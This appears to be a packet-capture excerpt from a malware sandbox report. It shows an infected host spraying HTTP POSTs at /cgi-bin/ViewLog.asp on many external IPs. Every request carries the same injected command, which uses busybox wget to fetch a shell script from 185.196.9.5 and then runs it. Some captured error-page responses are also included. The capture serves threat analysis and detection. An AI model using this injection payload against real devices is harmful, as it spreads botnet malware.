0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20 Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')

Session ID	Source IP	Source Port	Destination IP	Destination Port
935	192.168.2.15	40440	94.105.59.69	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:45.603234053 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:46.181181908 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
936	192.168.2.15	48268	31.136.186.58	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:45.603236914 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:48.613358021 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:54.757148027 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:06.788934946 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:31.620755911 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
937	192.168.2.15	49702	95.214.147.209	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:45.607738972 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
938	192.168.2.15	51740	94.121.210.127	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:45.637402058 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
939	192.168.2.15	55548	94.120.163.232	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:45.638880968 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
940	192.168.2.15	39550	94.122.21.176	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:45.638947964 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
941	192.168.2.15	56452	94.122.216.38	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:45.861332893 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
942	192.168.2.15	47872	95.86.71.98	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:45.872080088 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
943	192.168.2.15	55050	94.142.130.10	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:45.902287960 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:46.001291990 CET	1260	IN	HTTP/1.1 400 Bad Request Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 18:04:45 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3572 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, s

Session ID	Source IP	Source Port	Destination IP	Destination Port
944	192.168.2.15	57284	85.93.116.155	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:45.989483118 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:46.178891897 CET	615	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Sun, 25 Feb 2024 18:04:46 GMT Keep-Alive: timeout=20 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
945	192.168.2.15	36632	62.45.49.43	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:45.994666100 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
946	192.168.2.15	52516	94.110.135.209	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.080898046 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
947	192.168.2.15	36336	85.193.70.246	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.082078934 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:46.304259062 CET	990	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: ru Content-Length: 794 Date: Sun, 25 Feb 2024 18:04:46 GMT Keep-Alive: timeout=20 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 